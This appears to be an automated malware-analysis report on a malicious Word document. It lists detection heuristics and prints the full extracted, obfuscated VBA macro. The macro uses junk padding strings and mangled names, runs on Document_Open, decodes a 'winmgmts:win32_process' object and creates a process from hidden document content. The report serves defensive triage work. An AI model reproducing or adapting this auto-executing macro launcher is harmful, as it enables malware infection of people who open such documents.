MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Valyria-10034158-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Jdm74rzs4y2p2zfm_u = VBA.GetObject(J8zona45gf3qr0) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8529 bytes |
SHA-256: f3c1208957a8588b8a5352b63af9a94a87401fa2b1f98d6dafce63f68312781e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
83 of 150 identifiers look randomly generated (e.g. 'Uyflg5ryl7s4km2pbn'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "A5ate73kc6cw5njy"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Swrnfbrhhv1hn8ci80
End Sub
Attribute VB_Name = "Zcf1kk3t2ssv4r07m"
Attribute VB_Name = "Gusca95luq_"
Function Swrnfbrhhv1hn8ci80()
GoTo IUHjJ
Const LpCFBdE As String = "A"
Const BvPhx As String = ","
Const XlUFJHR As String = "*high*,*critic*"
Dim HIXwxDo As Range: Set HIXwxDo = Array((LpCFBdE), Target)
If HIXwxDo Is Nothing Then
End If
Dim tCOXBDEPL() As String: tCOXBDEPL = Split(XlUFJHR, BvPhx)
IUHjJ:
skuwd = E1eikun_vqz38wvur + A5ate73kc6cw5njy _
. _
Content + Sbgh3kd2dneltk
GoTo elqXMZ
Const zHRlEdEP As String = "A"
Const uldHRAc As String = ","
Const rSrZBJJv As String = "*high*,*critic*"
Dim DKUOJzi As Range: Set DKUOJzi = Array((zHRlEdEP), Target)
If DKUOJzi Is Nothing Then
End If
Dim DGpFCB() As String: DGpFCB = Split(rSrZBJJv, uldHRAc)
elqXMZ:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
Rjwqx5pa0bii0zjv0 = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
GoTo prhgQCFm
Const bpMND As String = "A"
Const ixJTYF As String = ","
Const nvNjhAFA As String = "*high*,*critic*"
Dim vDIdCwGfT As Range: Set vDIdCwGfT = Array((bpMND), Target)
If vDIdCwGfT Is Nothing Then
End If
Dim PASRFGECE() As String: PASRFGECE = Split(nvNjhAFA, ixJTYF)
prhgQCFm:
Wti36fxa67_iliapeg = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
GoTo vEmIAMH
Const eGHABDHYI As String = "A"
Const wJdJAI As String = ","
Const DSEaFYQ As String = "*high*,*critic*"
Dim PdrYYCtJ As Range: Set PdrYYCtJ = Array((eGHABDHYI), Target)
If PdrYYCtJ Is Nothing Then
End If
Dim DunxEHX() As String: DunxEHX = Split(DSEaFYQ, wJdJAI)
vEmIAMH:
Qcpt8n14rllbi98 = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
GoTo ffeODEi
Const eBzEFGPxh As String = "A"
Const UsjaB As String = ","
Const sujuoHFCJ As String = "*high*,*critic*"
Dim kRgnIQJCn As Range: Set kRgnIQJCn = Array((eBzEFGPxh), Target)
If kRgnIQJCn Is Nothing Then
End If
Dim uZukAmEA() As String: uZukAmEA = Split(sujuoHFCJ, UsjaB)
ffeODEi:
Sq3vjdsxcq9piizr = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
GoTo zYRcUHEHG
Const xfQswJFE As String = "A"
Const lhhIDAA As String = ","
Const fEDGCAg As String = "*high*,*critic*"
Dim xjjUNmJ As Range: Set xjjUNmJ = Array((xfQswJFE), Target)
If xjjUNmJ Is Nothing Then
End If
Dim VZWOFv() As String: VZWOFv = Split(fEDGCAg, lhhIDAA)
zYRcUHEHG:
B8ot8fduc6wr = Qcpt8n14rllbi98 + Sq3vjdsxcq9piizr + Wti36fxa67_iliapeg + mjbBYHhbs + Rjwqx5pa0bii0zjv0
GoTo QFAdJG
Const yNpnD As String = "A"
Const ifTgDoG As String = ","
Const JjJbB As String = "*high*,*critic*"
Dim tuLCMCI As Range: Set tuLCMCI = Array((yNpnD), Target)
If tuLCMCI Is Nothing Then
End If
Dim aACrBzCHd() As String: aACrBzCHd = Split(JjJbB, ifTgDoG)
QFAdJG:
J8zona45gf3qr0 = K2eqcmojfn8ix90d6(B8ot8fduc6wr)
GoTo AQJEzpnoG
Const qtNpWFzCE As String = "A"
Const JaknVR As String = ","
Const riWqFGJY As String = "*high*,*critic*"
Dim lHXavB As Range: Set lHXavB = Array((qtNpWFzCE), Target)
If lHXavB Is Nothing Then
End If
Dim IOPMfG() As String: IOPMfG = Split(riWqFGJY, JaknVR)
AQJEzpnoG:
Set Jdm74rzs4y2p2zfm_u = VBA.GetObject(J8zona45gf3qr0)
GoTo YtjFBe
Const KAAmsFJLa As String = "A"
Const NFoIZAgdj As String = ","
Const sOfSqNO As String = "*high*,*critic*"
Dim espWEuWIh As Range: Set espWEuWIh = Array((KAAmsFJLa), Target)
If espWEuWIh Is Nothing Then
End If
Dim ZDKqIFEBG() As String: ZDKqIFEBG = Split(sOfSqNO, NFoIZAgdj)
YtjFBe:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = K2eqcmojfn8ix90d6(mxkikw)
GoTo LnRqcjdHC
Const muQUuJD As String = "A"
Const xBaZq As String = ","
Const urqwC As String = "*high*,*critic*"
Dim rykKLTfBV As Range: Set rykKLTfBV = Array((muQUuJD), Target)
If rykKLTfBV Is Nothing Then
End If
Dim xnvME() As String: xnvME = Split(urqwC, xBaZq)
LnRqcjdHC:
Jdm74rzs4y2p2zfm_u.Create pqwm, Alvw54nlrq0k5fkzbc, Y10e4jw1j3djjv0vy_
GoTo HsRXzxA
Const IKEyYJ As String = "A"
Const dBZlAG As String = ","
Const HYqcb As String = "*high*,*critic*"
Dim nEsTCdYDH As Range: Set nEsTCdYDH = Array((IKEyYJ), Target)
If nEsTCdYDH Is Nothing Then
End If
Dim PEoELvIQJ() As String: PEoELvIQJ = Split(HYqcb, dBZlAG)
HsRXzxA:
End Function
Function K2eqcmojfn8ix90d6(R3q4in34ym5v2il)
On Error Resume Next
GoTo VHxfT
Const jyxYAFLC As String = "A"
Const BJMbZuJRF As String = ","
Const XpIXCDhMq As String = "*high*,*critic*"
Dim LXXQDDfJ As Range: Set LXXQDDfJ = Array((jyxYAFLC), Target)
If LXXQDDfJ Is Nothing Then
End If
Dim kXidGGmrk() As String: kXidGGmrk = Split(XpIXCDhMq, BJMbZuJRF)
VHxfT:
Iuykcdayu0ux2dsn = R3q4in34ym5v2il
GoTo UTlaBhGD
Const jzCVAIVG As String = "A"
Const pNdoqWCxt As String = ","
Const WPKmFe As String = "*high*,*critic*"
Dim clPKFBjz As Range: Set clPKFBjz = Array((jzCVAIVG), Target)
If clPKFBjz Is Nothing Then
End If
Dim otHyDQA() As String: otHyDQA = Split(WPKmFe, pNdoqWCxt)
UTlaBhGD:
Pk_5b3ebff5osp = Qbtcycloqlj79qjl(Iuykcdayu0ux2dsn)
GoTo AQOwDFGF
Const SzdUE As String = "A"
Const SVfwH As String = ","
Const fsCkG As String = "*high*,*critic*"
Dim FGWgu As Range: Set FGWgu = Array((SzdUE), Target)
If FGWgu Is Nothing Then
End If
Dim cHCfACCC() As String: cHCfACCC = Split(fsCkG, SVfwH)
AQOwDFGF:
K2eqcmojfn8ix90d6 = Pk_5b3ebff5osp
GoTo ortGB
Const cyDODgZgJ As String = "A"
Const yPcgGA As String = ","
Const cpeHA As String = "*high*,*critic*"
Dim oAcbS As Range: Set oAcbS = Array((cyDODgZgJ), Target)
If oAcbS Is Nothing Then
End If
Dim RcxFVMDOH() As String: RcxFVMDOH = Split(cpeHA, yPcgGA)
ortGB:
End Function
Function Qbtcycloqlj79qjl(Uyflg5ryl7s4km2pbn)
GoTo kWUSef
Const WzIrJQJ As String = "A"
Const NYPQCHF As String = ","
Const TjMQdBBgE As String = "*high*,*critic*"
Dim gvcgAIUM As Range: Set gvcgAIUM = Array((WzIrJQJ), Target)
If gvcgAIUM Is Nothing Then
End If
Dim CNUcG() As String: CNUcG = Split(TjMQdBBgE, NYPQCHF)
kWUSef:
GoTo WiAHIOige
Const DObDSSSH As String = "A"
Const PCtZE As String = ","
Const PmuwJBJH As String = "*high*,*critic*"
Dim lrUBAA As Range: Set lrUBAA = Array((DObDSSSH), Target)
If lrUBAA Is Nothing Then
End If
Dim MhDEGJ() As String: MhDEGJ = Split(PmuwJBJH, PCtZE)
WiAHIOige:
GoTo PTpduh
Const dFuMF As String = "A"
Const IkIlHED As String = ","
Const ctRAim As String = "*high*,*critic*"
Dim PwyZCI As Range: Set PwyZCI = Array((dFuMF), Target)
If PwyZCI Is Nothing Then
End If
Dim tWLOCW() As String: tWLOCW = Split(ctRAim, IkIlHED)
PTpduh:
Qbtcycloqlj79qjl = Replace(Uyflg5ryl7s4km2pbn, "ns w" + "u db nd", Zqvivtw592lxn)
GoTo NGzByr
Const huVBjtENv As String = "A"
Const hxzoFBtLC As String = ","
Const sHhQm As String = "*high*,*critic*"
Dim wdpnM As Range: Set wdpnM = Array((huVBjtENv), Target)
If wdpnM Is Nothing Then
End If
Dim JtcSFJR() As String: JtcSFJR = Split(sHhQm, hxzoFBtLC)
NGzByr:
GoTo ArMYJEkJb
Const SbmMCGuEY As String = "A"
Const OwqxzJE As String = ","
Const NvjyW As String = "*high*,*critic*"
Dim cjdFFEGu As Range: Set cjdFFEGu = Array((SbmMCGuEY), Target)
If cjdFFEGu Is Nothing Then
End If
Dim mnSyJHAv() As String: mnSyJHAv = Split(NvjyW, OwqxzJE)
ArMYJEkJb:
GoTo JvTSZI
Const dvuZzGDnA As String = "A"
Const ZJSnRBDm As String = ","
Const VcboAE As String = "*high*,*critic*"
Dim HKXrDBEI As Range: Set HKXrDBEI = Array((dvuZzGDnA), Target)
If HKXrDBEI Is Nothing Then
End If
Dim OOobG() As String: OOobG = Split(VcboAE, ZJSnRBDm)
JvTSZI:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.